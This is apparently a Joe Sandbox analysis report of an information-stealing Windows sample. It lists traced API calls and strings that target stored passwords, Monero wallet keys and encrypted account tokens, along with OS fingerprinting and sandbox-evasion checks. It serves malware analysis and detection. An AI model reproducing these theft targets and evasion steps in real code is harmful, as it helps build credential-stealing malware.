Source File: 00000000.00000002.2266052728.0000000000041000.00000040.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true

Associated: 00000000.00000002.2266034440.0000000000040000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000009A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000001E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000029E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000513000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266535420.000000000054D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266630055.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266642633.00000000006F3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40000_file.jbxd

Yara matches

Similarity

API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
String ID:
API String ID: 2507841554-0
Opcode ID: a4549adc05d56185bf2db496c6e54096f04ea1ef0359f52f1cfd07fc2f69ab90
Instruction ID: ca92cc86b23491690ff080c2e34f37ef430d44e478d060e8a6418b670e8a5380
Opcode Fuzzy Hash: a4549adc05d56185bf2db496c6e54096f04ea1ef0359f52f1cfd07fc2f69ab90
Instruction Fuzzy Hash: 205197B1A00208ABEF20DF50DD49BEE77B8FB45701F1041A9F605A71C1EBB56A89CF56

Function 000472D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 0004733A
RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 000473B1
StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0004740D
GetProcessHeap.KERNEL32(00000000,?), ref: 00047452
HeapFree.KERNEL32(00000000), ref: 00047459
task.LIBCPMTD ref: 00047555

Strings

Password, xrefs: 00047401

Memory Dump Source

Source File: 00000000.00000002.2266052728.0000000000041000.00000040.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true

Associated: 00000000.00000002.2266034440.0000000000040000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000009A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000001E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000029E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000513000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266535420.000000000054D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266630055.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266642633.00000000006F3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40000_file.jbxd

Yara matches

Similarity

API ID: Heap$EnumFreeOpenProcessValuetask
String ID: Password
API String ID: 775622407-3434357891
Opcode ID: 7b6b1ab1ff84837d8f25b4dacd21d3fba9879625aa965e5f18621e6359bc996b
Instruction ID: 52407f8652c0f890ce4d5078185ec7f5468eda47d93253e143530e989f2f1c0c
Opcode Fuzzy Hash: 7b6b1ab1ff84837d8f25b4dacd21d3fba9879625aa965e5f18621e6359bc996b
Instruction Fuzzy Hash: 99613CB59041689BDB24DB50DC45BEEB7B8BF44300F0085E9E649A6142EFB06FC9CFA5

Function 0004BA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0005A740: lstrcpy.KERNEL32(00060E17,00000000), ref: 0005A788

Part of subcall function 0005A9B0: lstrlen.KERNEL32(?,00CE8690,?,\Monero\wallet.keys,00060E17), ref: 0005A9C5
Part of subcall function 0005A9B0: lstrcpy.KERNEL32(00000000), ref: 0005AA04
Part of subcall function 0005A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0005AA12

Part of subcall function 0005A920: lstrcpy.KERNEL32(00000000,?), ref: 0005A972
Part of subcall function 0005A920: lstrcat.KERNEL32(00000000), ref: 0005A982

Part of subcall function 0005A8A0: lstrcpy.KERNEL32(?,00060E17), ref: 0005A905

Part of subcall function 0005A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0005A7E6

lstrlen.KERNEL32(00000000), ref: 0004BC9F

Part of subcall function 00058E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00058E52

StrStrA.SHLWAPI(00000000,AccountId), ref: 0004BCCD
lstrlen.KERNEL32(00000000), ref: 0004BDA5
lstrlen.KERNEL32(00000000), ref: 0004BDB9

Strings

AccountTokens, xrefs: 0004BABA
AccountTokens, xrefs: 0004BB49
AccountId, xrefs: 0004BCC4
SELECT service, encrypted_token FROM token_service, xrefs: 0004BBEB

Memory Dump Source

Source File: 00000000.00000002.2266052728.0000000000041000.00000040.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true

Associated: 00000000.00000002.2266034440.0000000000040000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000009A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000001E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000029E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000513000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266535420.000000000054D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266630055.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266642633.00000000006F3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
API String ID: 3073930149-1079375795
Opcode ID: bd237a670690b38fc2ff4303b98a0a6ab20d3f0480e604a44def4dd9dae21187
Instruction ID: eee2fd1382dad445a1995a0c998845d5ea6653fa3f50998fea466b7302b40699
Opcode Fuzzy Hash: bd237a670690b38fc2ff4303b98a0a6ab20d3f0480e604a44def4dd9dae21187
Instruction Fuzzy Hash: 7CB12D71A101189BDF04EBA0DC96EFF7339BF55301F404269F906A6192EF346A4DCBA2

Function 00044FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00044FCA
RtlAllocateHeap.NTDLL(00000000), ref: 00044FD1
InternetOpenA.WININET(00060DDF,00000000,00000000,00000000,00000000), ref: 00044FEA
InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00045011
InternetReadFile.WININET(?,?,00000400,00000000), ref: 00045041
InternetCloseHandle.WININET(?), ref: 000450B9
InternetCloseHandle.WININET(?), ref: 000450C6

Memory Dump Source

Source File: 00000000.00000002.2266052728.0000000000041000.00000040.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true

Associated: 00000000.00000002.2266034440.0000000000040000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000009A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000001E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000029E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000513000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266535420.000000000054D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266630055.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266642633.00000000006F3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40000_file.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
String ID:
API String ID: 3066467675-0
Opcode ID: 491faf720ac768b25e04a89919d0779af1fb9c85806905399ae4ca192b8f11b8
Instruction ID: cc6f9f6faedcea630da925a3c03b6dadf204be8170fca1fc81a4040c5cd33738
Opcode Fuzzy Hash: 491faf720ac768b25e04a89919d0779af1fb9c85806905399ae4ca192b8f11b8
Instruction Fuzzy Hash: 7A311DB4A40218ABEB20CF54DC89BDDB7B4EB48705F1081D9E70967281CB706E858F99

Function 000583DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON

Download Yara Rule

APIs

RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00058426
wsprintfA.USER32 ref: 00058459
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0005847B
RegCloseKey.ADVAPI32(00000000), ref: 0005848C
RegCloseKey.ADVAPI32(00000000), ref: 00058499

Part of subcall function 0005A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0005A7E6

RegQueryValueExA.KERNEL32(00000000,00CEEDD0,00000000,000F003F,?,00000400), ref: 000584EC
lstrlen.KERNEL32(?), ref: 00058501
RegQueryValueExA.KERNEL32(00000000,00CEEDE8,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00060B34), ref: 00058599
RegCloseKey.KERNEL32(00000000), ref: 00058608
RegCloseKey.ADVAPI32(00000000), ref: 0005861A

Strings

%s\%s, xrefs: 0005844D

Memory Dump Source

Source File: 00000000.00000002.2266052728.0000000000041000.00000040.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true

Associated: 00000000.00000002.2266034440.0000000000040000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000009A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000001E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000029E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000513000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266535420.000000000054D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266630055.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266642633.00000000006F3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40000_file.jbxd

Yara matches

Similarity

API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
String ID: %s\%s
API String ID: 3896182533-4073750446
Opcode ID: abfe00a5a97dfb60a28808d4b0c882e31c78bc5e0e31cdbc5b3eeb1c58693cca
Instruction ID: b4c4b4b979cf8f33d7205337f9049a294cbe8aabdb82db8310e187eb68572cc2
Opcode Fuzzy Hash: abfe00a5a97dfb60a28808d4b0c882e31c78bc5e0e31cdbc5b3eeb1c58693cca
Instruction Fuzzy Hash: 78214C7590121C9BEB24DB54DC85FE9B3B8FB48701F00C1D9EA09A6140DF71AA85CFE4

Function 00057690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 000576A4
RtlAllocateHeap.NTDLL(00000000), ref: 000576AB
RegOpenKeyExA.KERNEL32(80000002,00CDB628,00000000,00020119,00000000), ref: 000576DD
RegQueryValueExA.KERNEL32(00000000,00CEED88,00000000,00000000,?,000000FF), ref: 000576FE
RegCloseKey.ADVAPI32(00000000), ref: 00057708

Strings

Windows 11, xrefs: 000576BD

Memory Dump Source

Source File: 00000000.00000002.2266052728.0000000000041000.00000040.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true

Associated: 00000000.00000002.2266034440.0000000000040000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000009A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000001E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000029E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000513000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266535420.000000000054D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266630055.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266642633.00000000006F3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID: Windows 11
API String ID: 3225020163-2517555085
Opcode ID: e625257d6a6d6584c963d8ba9afad3fdcfc020ed2bd06d1d6e0679e2e9d9249f
Instruction ID: 7938ffb6c71aa07100579fd2477d53b3ddb683b2f03ebc0f972b214674fff3c2
Opcode Fuzzy Hash: e625257d6a6d6584c963d8ba9afad3fdcfc020ed2bd06d1d6e0679e2e9d9249f
Instruction Fuzzy Hash: 96014FB9A45208BBFB00DBE4FC4DFAEB7B8EB48702F104455FE0497291DA7499049B61

Function 00057720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00057734
RtlAllocateHeap.NTDLL(00000000), ref: 0005773B
RegOpenKeyExA.KERNEL32(80000002,00CDB628,00000000,00020119,000576B9), ref: 0005775B
RegQueryValueExA.KERNEL32(000576B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0005777A
RegCloseKey.ADVAPI32(000576B9), ref: 00057784

Strings

CurrentBuildNumber, xrefs: 00057771

Memory Dump Source

Source File: 00000000.00000002.2266052728.0000000000041000.00000040.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true

Associated: 00000000.00000002.2266034440.0000000000040000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000009A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000000FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000012F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000014F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000015E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.00000000001E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.0000000000205000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266052728.000000000020B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000029E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000513000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.0000000000535000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266335016.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266535420.000000000054D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266630055.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266642633.00000000006F3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID: CurrentBuildNumber
API String ID: 3225020163-1022791448
Opcode ID: d40a0190aa30601d57ca37029e70a82f551f76b548b405200a4aa3d79525aa5a
Instruction ID: 38462cf5ae30b4e49330fe0f7362b5989ccadd5847f381b52126eb8178ff6f3b
Opcode Fuzzy Hash: d40a0190aa30601d57ca37029e70a82f551f76b548b405200a4aa3d79525aa5a
Instruction Fuzzy Hash: 210167B9A41308BBFB00DBE0EC4DFAEB7B8FB48701F004555FA05A7281DA745900CB62

Function 000569F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00059860: GetProcAddress.KERNEL32(75900000,00CE0420), ref: 000598A1
Part of subcall function 00059860: GetProcAddress.KERNEL32(75900000,00CE05D0), ref: 000598BA
Part of subcall function 00059860: GetProcAddress.KERNEL32(75900000,00CE05E8), ref: 000598D2
Part of subcall function 00059860: GetProcAddress.KERNEL32(75900000,00CE0438), ref: 000598EA
Part of subcall function 00059860: GetProcAddress.KERNEL32(75900000,00CE0648), ref: 00059903
Part of subcall function 00059860: GetProcAddress.KERNEL32(75900000,00CE89C0), ref: 0005991B
Part of subcall function 00059860: GetProcAddress.KERNEL32(75900000,00CD5CC8), ref: 00059933
Part of subcall function 00059860: GetProcAddress.KERNEL32(75900000,00CD5C28), ref: 0005994C
Part of subcall function 00059860: GetProcAddress.KERNEL32(75900000,00CE0600), ref: 00059964
Part of subcall function 00059860: GetProcAddress.KERNEL32(75900000,00CE0630), ref: 0005997C
Part of subcall function 00059860: GetProcAddress.KERNEL32(75900000,00CE03D8), ref: 00059995
Part of subcall function 00059860: GetProcAddress.KERNEL32(75900000,00CE0660), ref: 000599AD
Part of subcall function 00059860: GetProcAddress.KERNEL32(75900000,00CD5CE8), ref: 000599C5
Part of subcall function 00059860: GetProcAddress.KERNEL32(75900000,00CE06A8), ref: 000599DE

Part of subcall function 0005A740: lstrcpy.KERNEL32(00060E17,00000000), ref: 0005A788

Part of subcall function 000411D0: ExitProcess.KERNEL32 ref: 00041211

Part of subcall function 00041160: GetSystemInfo.KERNEL32(?), ref: 0004116A
Part of subcall function 00041160: ExitProcess.KERNEL32 ref: 0004117E

Part of subcall function 00041110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0004112B
Part of subcall function 00041110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00041132
